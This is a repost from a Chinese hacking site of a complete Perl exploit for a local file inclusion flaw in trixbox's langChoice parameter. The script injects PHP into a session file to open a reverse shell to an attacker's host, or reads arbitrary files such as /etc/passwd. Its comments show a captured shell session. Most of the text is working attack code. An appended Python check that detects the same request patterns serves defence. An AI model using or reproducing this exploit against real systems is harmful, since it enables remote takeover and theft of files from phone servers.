
    trixbox (langChoice) Local File Inclusion Exploit (connect-back)

    Posted by: 网神之王 | Posted on: 2025-6-28 22:44 | Views: 86 | Comments: 0

[code]
#!/usr/bin/perl -w

# Jean-Michel BESNARD - LEXSI Audit
# 2008-07-08
# perl trixbox_fi.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
#     1> Remote TCP shell
#     2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444 ...
# connect to [192.168.1.132] from [192.168.1.212] 46532
# JMB: no job control in this shell
# JMB: /root/.bashrc: Permission denied
# JMB-3.1$ id
# uid=102(asterisk) gid=103(asterisk) groups=103(asterisk)

use strict;
use Switch;
use LWP::UserAgent;
use HTTP::Cookies;

usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);

menu();

sub execScript{
    my $scriptCode = shift;
    post($scriptCode);
    my $phpsessionid = extractPHPSID($cookie_jar->as_string);
    post("langChoice=../../../../../tmp/sess_$phpsessionid");
}

sub post{
    my $postData = shift;
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($postData);
    my $res = $ua->request($req);
    my $content = $res->content;
    return $content;
}

sub readFile{
    my $file = shift;
    my $content = post("langChoice=../../../../..$file");
    my @fileLines = split(/\n/,$content);
    my $fileContent = "Content of $file: \n\n";
    for(my $i=3;$i<@fileLines;$i++){
        last if($fileLines[$i] =~ m/trixbox - User Mode/);
        $fileContent = $fileContent . $fileLines[$i-3] . "\n";
    }
    return $fileContent;
}

sub tcp_reverse_shell{
    my $rhost= shift;
    my $rport = shift;
    my $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>";
    execScript($rshell);
}

sub extractPHPSID{
    $_ = shift;
    if(/PHPSESSID=(\w+)/){
        return $1;
    }
}

sub menu{
    print <<EOF;
Please listen carefully as our menu option has changed
Choose from the following options:
    1> Remote TCP shell
    2> Read local file
EOF
    my $option = <STDIN>;
    chop($option);
    switch($option){
        case 1 {
            print "Host and port the reverse shell should connect to ? ";
            print "(<host>:<port>): ";
            my $hp=<STDIN>;
            chop($hp);
            my($rhost,$rport) = split(/:/,$hp);
            print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
            print "Press enter to continue...";
            <STDIN>;
            tcp_reverse_shell($rhost,$rport);
            print "done...\n";
        }
        case 2 {
            while(1){
                print "Full path (e.g. /etc/passwd): ";
                my $file = <STDIN>;
                chop($file);
                print readFile($file) . "\n\n";
            }
        }
    }
}

sub usage{
    print "./trixbox_fi.pl <host>\n";
    exit 1;
}

# milw0rm.com [2008-07-08]
[/code]

    Source: https://www.jb51.net/hack/5653.html
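
A defensive counterpart to the script above, as an added example that is not part of the original post or of the trixbox code base: a check that flags the request patterns the script sends in the `langChoice` POST field (PHP code in the parameter, then a `../` path to `/tmp/sess_<id>`). It also undoes nested percent-encoding, which goes beyond what the script itself does. The allowlist pattern for legitimate values, the reason labels and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: legitimate langChoice values are short language names.
ALLOWED = re.compile(r"[A-Za-z_]{2,16}")
TRAVERSAL = re.compile(r"\.\.[/\\]")
SESSION_FILE = re.compile(r"(?:^|/)sess_\w+")
PHP_TAG = re.compile(r"<\?")


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_langchoice(body):
    """Return the reasons a form-encoded POST body looks like langChoice abuse."""
    reasons = []
    for raw in parse_qs(body, keep_blank_values=True).get("langChoice", []):
        value = fully_decode(raw)
        found = []
        if PHP_TAG.search(value):
            found.append("php-code-in-parameter")
        if TRAVERSAL.search(value):
            found.append("path-traversal")
        if SESSION_FILE.search(value):
            found.append("session-file-include")
        # Anything else that is not a plain language name is still rejected.
        if not found and not ALLOWED.fullmatch(value):
            found.append("not-allowlisted")
        reasons.extend(found)
    return reasons


if __name__ == "__main__":
    # Constructed sample POST bodies, e.g. as captured by a WAF audit log.
    samples = [
        "langChoice=english",
        "langChoice=../../../../../etc/passwd",
        "langChoice=../../../../../tmp/sess_abc123",
        "langChoice=%252e%252e%252fetc%252fpasswd",
    ]
    for body in samples:
        print(body, "->", inspect_langchoice(body) or "ok")
```

Because `langChoice` travels in the POST body, this check needs a data source that records request bodies; standard access logs do not.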